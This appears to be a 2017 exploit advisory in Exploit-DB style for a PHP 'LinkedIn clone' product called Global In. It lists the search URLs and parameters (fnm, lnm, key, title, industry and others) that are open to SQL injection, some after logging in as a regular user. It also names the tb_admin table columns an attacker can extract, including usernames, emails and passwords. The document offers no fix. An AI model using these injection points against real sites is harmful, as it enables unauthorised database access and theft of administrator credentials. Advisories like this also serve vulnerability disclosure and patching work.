26 lines
No EOL
919 B
Text
26 lines
No EOL
919 B
Text
# # # # #
|
|
# Exploit Title: Global In – A LinkedIn Clone - SQL Injection
|
|
# Google Dork: N/A
|
|
# Date: 11.03.2017
|
|
# Vendor Homepage: https://www.techbizstudio.com/
|
|
# Software: https://www.techbizstudio.com/product/linkedin-clone/
|
|
# Demo: https://www.techbizstudio.com/demo/globalin/
|
|
# Version: N/A
|
|
# Tested on: Win7 x64, Kali Linux x64
|
|
# # # # #
|
|
# Exploit Author: Ihsan Sencan
|
|
# Author Web: http://ihsan.net
|
|
# Author Mail: ihsan[@]ihsan[.]net
|
|
# # # # #
|
|
# SQL Injection/Exploit :
|
|
# http://localhost/[PATH]/hsearch?accept=true&fnm=[SQL]&lnm=[SQL]
|
|
# http://localhost/[PATH]/search?type=company&key=[SQL] [Login as regular user]
|
|
# http://localhost/[PATH]/search?type=people&key=[SQL]&fnm=[SQL]&lnm=[SQL]&title=[SQL]&com=[SQL]&sc=[SQL]&co=[SQL]&industry=[SQL] [Login as regular user]
|
|
# tb_admin :id
|
|
# tb_admin :username
|
|
# tb_admin :email
|
|
# tb_admin :password
|
|
# tb_admin :ip_address
|
|
# tb_admin :is_active
|
|
# Etc..
|
|
# # # # # |